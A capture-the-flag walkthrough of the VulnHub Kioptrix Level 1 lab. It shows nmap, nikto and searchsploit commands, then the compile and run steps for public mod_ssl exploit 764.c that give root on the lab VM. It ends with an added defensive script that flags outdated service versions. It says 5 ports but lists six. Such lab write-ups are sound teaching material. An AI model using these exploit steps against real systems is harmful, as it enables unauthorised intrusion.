VulnHub: Kioptrix: Level 1 (#1)

ratiros01
Mar 10, 2021

Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Importing to VirtualBox: https://medium.com/uzair-ahmed/how-to-import-kioptrix-level-1-into-virtual-box-d83e8638be9d

1. Network scan

nmap -sn <ip>/24

The target’s IP is 10.0.2.6.

2. Port scan

nmap -Pn 10.0.2.6

There are 5 ports: 22, 80, 111, 139, 443, 32768.

3. High port scan

nmap -Pn -p1000- 10.0.2.6

This found nothing beyond what the previous scan showed.

4. OS and service scan

nmap -A -p 22,80,111,139,443,32768 10.0.2.6

5. Vuln scan

nmap --script vuln -p 22,80,111,139,443,32768 10.0.2.6

There are interesting pages on the HTTP service (port 80).

There are possible vulnerabilities in Samba and SMB.

6. Search for an exploit on SSH (port 22)

searchsploit OpenSSH 2.9p2
searchsploit -m 45001

Reading the script shows it needs a username and password, so I’ll put this method on hold.

7. Search for an exploit on HTTP (port 80)

nikto -h http://10.0.2.6

After reading, I’ll start w/ this one, “Remote Shell” — OSVDB-756 — mod_ssl 2.8.4

searchsploit mod_ssl

There are 3 C source files.

Let’s start w/ 764.c

searchsploit -m 764

Read the script; it includes a compile command.

gcc -o myexploit 764.c -lcrypto

Error!!! After googling I found a fix.

Fix: https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/

Follow the steps and compile again. I saved it as “764_fix.c”.

Run the compiled binary

./myexploit

I have to use the correct target. Looking back at the previous scan, the Apache version is 1.3.20. There are 2 possibilities, 0x6a and 0x6b.

Run the first target, 0x6a

./myexploit 0x6a 10.0.2.6

Failed!!!

Run the second target, 0x6b

./myexploit 0x6b 10.0.2.6

After running the script, the machine downloaded a ptrace script and ran it automatically.

Verify user

whoami

I’m root.
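
Every step above started from a version string the scans returned (OpenSSH 2.9p2, Apache 1.3.20, mod_ssl 2.8.4). As an added example, not part of the original write-up, this script audits `nmap -sV` style service lines against a minimum-version baseline from the defender's side. The sample scan text, the extra port 8080 line and the baseline values are constructed assumptions.

```python
import re

# Constructed sample of `nmap -sV` service lines. Versions on 22/80/443 are the
# ones named in the walkthrough; the 8080 line is an invented compliant service.
SAMPLE_SCAN = """\
22/tcp   open  ssh      OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http     Apache httpd 1.3.20 ((Unix) mod_ssl/2.8.4)
443/tcp  open  ssl/http Apache httpd 1.3.20 ((Unix) mod_ssl/2.8.4)
8080/tcp open  http     Apache httpd 2.4.58 ((Unix))
"""

# Assumed policy minimums for this example only, not vendor guidance.
BASELINE = {"openssh": (8, 0), "apache httpd": (2, 4), "mod_ssl": (2, 8, 31)}

# How each product's version appears in a service banner.
PATTERNS = {
    "openssh": re.compile(r"OpenSSH[ _/](\d+(?:\.\d+)*)"),
    "apache httpd": re.compile(r"Apache(?: httpd)?[ /](\d+(?:\.\d+)*)"),
    "mod_ssl": re.compile(r"mod_ssl/(\d+(?:\.\d+)*)"),
}


def parse_version(text):
    """Turn '1.3.20' into (1, 3, 20) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def audit(scan_text, baseline=BASELINE):
    """Return (port, product, version) for every open service below baseline."""
    findings = []
    for line in scan_text.splitlines():
        port_match = re.match(r"(\d+)/tcp\s+open\s", line)
        if not port_match:
            continue  # skip headers, closed ports and anything not a service line
        port = int(port_match.group(1))
        for product, minimum in baseline.items():
            hit = PATTERNS[product].search(line)
            # Suffixes such as 'p2' are ignored; only the numeric part is compared.
            if hit and parse_version(hit.group(1)) < minimum:
                findings.append((port, product, hit.group(1)))
    return findings


if __name__ == "__main__":
    for port, product, version in audit(SAMPLE_SCAN):
        print(f"port {port}: {product} {version} is below the baseline")
```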
